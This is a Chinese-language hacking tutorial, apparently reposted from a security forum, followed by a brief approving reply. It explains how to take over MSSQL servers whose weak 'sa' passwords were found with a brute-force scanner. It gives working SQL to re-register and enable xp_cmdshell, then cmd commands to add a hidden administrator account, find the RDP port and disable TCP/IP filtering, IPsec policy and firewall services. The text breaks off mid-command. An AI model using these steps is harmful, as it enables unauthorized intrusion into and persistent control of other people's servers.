1433口令提权的详细过程

小老

前段时间我朋友给我一个sopo的软件，说是扫1433口令的，而且猜解速度很快，我就找个服务器试了试，确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。（有人可能会说了，这有啥好研究的，sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的 大家可以捡有用的看 没用的就略过吧）

    下面来说sa下执行命令错误的几种情况：

    1、        无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126（找不到指定模块。）

    这种情况比较常见的，修复起来说简单也简单，但是有条件的。这种情况要是能列出目录（用sqltools v2.0就有列目录功能）恭喜你这个有80%的情况能修复了，如果能列目录，那么只要找到xplog70.dll的路径执行以下命令就可以了。

    第一步

    exec sp_dropextendedproc 'xp_cmdshell'   （这个命令就是删除原有的cmdshell，因为已经出错了）

    第二步

    dbcc addextendedproc （“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”）

    ;EXEC sp_configure 'show advanced options', 0 –

    当然这是sql命令，用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径，这个路径是比较常见的，如果c盘没有可以找找其他盘符。

    2、        无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因： 127（找不到指定的程序。）

    其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。

    3、        未能找到存储过程‘masterxpcmdshell'

    这种情况我看到网上的方法是：

    第一步先删除：

    drop procedure sp_addextendedproc

    drop procedure sp_oacreate

    exec sp_dropextendedproc 'xp_cmdshell'

    第二步恢复：

    dbcc addextendedproc （“sp_oacreate”,“odsole70.dll”）

    dbcc addextendedproc （“xp_cmdshell”,“xplog70.dll”）

    其实这个跟上面的还是一样，其实如果细心的话，上面的126 127只执行第一步的时候就会出现未能找到存储过程'masterxpcmdshell' 因为第一步就是删除cmdshell的存储过程。所以这种情况下只执行上面的第二个步骤就可以了。

    4.Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell’。有关启用 'xp_cmdshell' 的详细信息，请参阅 SQL Server 联机丛书中的 “外围应用配置器”。

    这种情况是最简单的了，因为什么都不用考虑，直接执行以下命令就可以了

    ;EXEC sp_configure 'show advanced options', 1 --

    ;RECONFIGURE WITH OVERRIDE --

    ;EXEC sp_configure 'xp_cmdshell', 1 --

    ;RECONFIGURE WITH OVERRIDE --

    ;EXEC sp_configure 'show advanced options', 0 –

    经过上面的修复能够执行cmd命令了，下面就要开始提权了。我一般都是ipconfig先查下ip看看是不是内网，然后REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal“ ”Server\WinStations\RDP-Tcp /v PortNumber查看一下终端端口，再netstat –an看看终端是否打开 然后net user 用户 密码 /add 加个用户 再net localgroup administrators 用户 /add一切顺利的话，这就拿下一个服务器了。但是在这个过程中还会遇到很多问题。

    1、        net提权成功但是连接不上终端有下面几种情况

    （1）、服务器在内网。

    （2）、做了tcp/ip筛选。

    先执行下面cmd命令：

    cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip，导出注册表里关于TCP/IP筛选的第一处

    cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip，导出注册表里关于TCP/IP筛选的第二处

    cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip“，导出注册表里关于TCP/IP筛选的第三处

    然后回到c盘1.reg,2.reg,3.reg，把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下，找到EnableSecurityFilters这个 字段看看dword后面的键值是否为00000000，如果为00000001就说明管理员做了tcp/ip筛选，我们只要把1改成0就行了，2.reg和3.reg进行一样的修改。

    （3）、做了ip安全策略。

    执行cmd命令： cmd /c net stop policyagent 将IPSEC Services服务停了它。再连终端。

    （4）、管理员设置的终端登陆权限只有指定的用户可以。

    （5）、防火墙。   执行cmd命令：   net stop alg /

本篇文章来源于 黑基网-中国最大的网络安全站点 原文链接：http://www.hackbase.com/tech/2010-06-10/60571.html

炫炫.

不错的。
我以前遇到过同样问题。
不过我解决了。
我也是执行cmd命令就完成了 没那么复杂